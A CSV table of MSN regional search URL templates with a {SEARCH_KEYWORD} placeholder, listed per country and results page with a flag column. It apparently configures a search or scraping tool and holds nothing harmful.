"International","MSN IN","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN IN","http://search.msn.co.in/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN","http://search.msn.co.in/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN IN 2 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d52.0......%26co%3d50.6.3.200.2.5.3.%26pn%3d1%26rd%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN IN 2 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN IN 2 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN IN 2 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d52.0......%26co%3d50.6.3.200.2.5.3.%26pn%3d1%26rd%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN 2 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d52.0......%26co%3d50.6.3.200.2.5.3.%26pn%3d1%26rd%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN 2 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN IN 3 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d102.0......%26co%3d50.6.3.200.2.5.3.%26rd%3d2%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN IN 3 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN IN 3 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN IN 3 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d102.0......%26co%3d50.6.3.200.2.5.3.%26rd%3d2%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN 3 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d102.0......%26co%3d50.6.3.200.2.5.3.%26rd%3d2%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN 3 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN IN 4 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d152.0......%26co%3d50.6.3.200.2.5.3.%26rd%3d2%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN IN 4 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN IN 4 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN IN 4 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d152.0......%26co%3d50.6.3.200.2.5.3.%26rd%3d2%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN 4 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d152.0......%26co%3d50.6.3.200.2.5.3.%26rd%3d2%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN 4 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN IN 5 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d202.0......%26co%3d50.6.3.200.2.5.3.%26rd%3d2%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN IN 5 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN IN 5 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN IN 5 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d202.0......%26co%3d50.6.3.200.2.5.3.%26rd%3d2%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN 5 (Next 50)","http://search.msn.co.in/results.aspx?ps=ba%3d202.0......%26co%3d50.6.3.200.2.5.3.%26rd%3d2%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN IN 5 (Next 50)","http://search.msn.co.in/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN MX","http://search.t1msn.com.mx/results.aspx?cp=1252&PI=9564&DI=233&FORM=MSNH&q={SEARCH_KEYWORD}","1"
"International","MSN MX","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN MX","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN MX","http://search.t1msn.com.mx/results.aspx?cp=1252&PI=9564&DI=233&FORM=MSNH&q={SEARCH_KEYWORD}","0"
"International","MSN MX","http://search.t1msn.com.mx/results.aspx?cp=1252&PI=9564&DI=233&FORM=MSNH&q={SEARCH_KEYWORD}","0"
"International","MSN MX","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN MX 2 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d14.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26pn%3d1%26rd%3d1%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN MX 2 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d14.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26pn%3d1%26rd%3d1%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN MX 2 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d14.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26pn%3d1%26rd%3d1%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN MX 2 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN MX 2 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN MX 2 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN MX 3 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d29.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26rd%3d1%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN MX 3 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d29.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26rd%3d1%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN MX 3 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d29.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26rd%3d1%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN MX 3 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN MX 3 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN MX 3 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN MX 4 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d44.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26rd%3d1%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN MX 4 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d44.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26rd%3d1%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN MX 4 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d44.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26rd%3d1%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN MX 4 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN MX 4 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN MX 4 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN MX 5 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d59.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26rd%3d1%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN MX 5 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d59.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26rd%3d1%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN MX 5 (Next 15)","http://search.t1msn.com.mx/results.aspx?ps=ba%3d59.0....2.0...%26co%3d15.6.3.200.2.5.10.3..%26CY%3des-mx%26rd%3d1%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN MX 5 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN MX 5 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN MX 5 (Next 50)","http://search.t1msn.com.mx/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN NL","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&FORM=SMCRT","1"
"International","MSN NL","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN NL","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN NL","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&FORM=SMCRT","0"
"International","MSN NL","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&FORM=SMCRT","0"
"International","MSN NL","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN NL 2 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d50.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN NL 2 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN NL 2 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN NL 2 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d50.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN NL 2 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d50.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN NL 2 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN NL 3 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d100.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN NL 3 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN NL 3 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN NL 3 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d100.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN NL 3 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d100.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN NL 3 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN NL 4 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d150.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN NL 4 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN NL 4 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN NL 4 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d150.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN NL 4 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d150.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN NL 4 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN NL 5 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d200.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN NL 5 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN NL 5 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN NL 5 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d200.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN NL 5 (Next 50)","http://search.msn.nl/results.aspx?ps=ba%3d200.0......%26co%3d50.6.3.200.2.5.3.%26CY%3dnl%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN NL 5 (Next 50)","http://search.msn.nl/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN SE","http://search.msn.se/results.aspx?ps=CY%3dsv%26ba%3d0%26co%3d50.6.200.3.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN SE","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN SE","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN SE","http://search.msn.se/results.aspx?ps=CY%3dsv%26ba%3d0%26co%3d50.6.200.3.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE","http://search.msn.se/results.aspx?ps=CY%3dsv%26ba%3d0%26co%3d50.6.200.3.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN SE 2 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.25)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26pn%3d1%26rd%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN SE 2 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN SE 2 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN SE 2 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.25)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26pn%3d1%26rd%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE 2 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.25)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26pn%3d1%26rd%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE 2 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN SE 3 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.75)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26rd%3d2%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN SE 3 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN SE 3 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN SE 3 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.75)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26rd%3d2%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE 3 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.75)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26rd%3d2%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE 3 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN SE 4 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.125)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26rd%3d2%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN SE 4 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN SE 4 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN SE 4 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.125)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26rd%3d2%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE 4 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.125)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26rd%3d2%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE 4 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN SE 5 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.175)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26rd%3d2%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN SE 5 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN SE 5 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN SE 5 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.175)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26rd%3d2%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE 5 (Next 50)","http://search.msn.se/results.aspx?ps=ba%3d(26.175)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dsv%26rd%3d2%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN SE 5 (Next 50)","http://search.msn.se/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN TW","http://search.msn.com.tw/results.aspx?ps=CY%3dzh-tw%26ba%3d0%26co%3d50.6.200.3.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN TW","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN TW","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN TW","http://search.msn.com.tw/results.aspx?ps=CY%3dzh-tw%26ba%3d0%26co%3d50.6.200.3.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW","http://search.msn.com.tw/results.aspx?ps=CY%3dzh-tw%26ba%3d0%26co%3d50.6.200.3.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN TW 2 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d50.0......%26co%3d50.6.200.3.2.5.3.%26CY%3dzh-tw%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN TW 2 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN TW 2 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN TW 2 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d50.0......%26co%3d50.6.200.3.2.5.3.%26CY%3dzh-tw%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW 2 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d50.0......%26co%3d50.6.200.3.2.5.3.%26CY%3dzh-tw%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW 2 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN TW 3 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d100.0......%26co%3d50.6.200.3.2.5.3.%26CY%3dzh-tw%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN TW 3 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN TW 3 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN TW 3 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d100.0......%26co%3d50.6.200.3.2.5.3.%26CY%3dzh-tw%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW 3 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d100.0......%26co%3d50.6.200.3.2.5.3.%26CY%3dzh-tw%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW 3 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN TW 4 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d(123.27)0......%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-tw%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN TW 4 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN TW 4 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN TW 4 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d(123.27)0......%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-tw%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW 4 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d(123.27)0......%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-tw%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW 4 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN TW 5 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d(123.43.34)0......%26co%3d(0..50)6.200.3.2.5.3.%26CY%3dzh-tw%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN TW 5 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN TW 5 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN TW 5 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d(123.43.34)0......%26co%3d(0..50)6.200.3.2.5.3.%26CY%3dzh-tw%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW 5 (Next 50)","http://search.msn.com.tw/results.aspx?ps=ba%3d(123.43.34)0......%26co%3d(0..50)6.200.3.2.5.3.%26CY%3dzh-tw%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN TW 5 (Next 50)","http://search.msn.com.tw/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN UK","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&FORM=SMCRT","1"
"International","MSN UK","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN UK","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN UK","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&FORM=SMCRT","0"
"International","MSN UK","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&FORM=SMCRT","0"
"International","MSN UK","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN UK 2 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d47.0(.3)0.1..0.1.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN UK 2 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN UK 2 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN UK 2 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d47.0(.3)0.1..0.1.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN UK 2 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d47.0(.3)0.1..0.1.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN UK 2 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
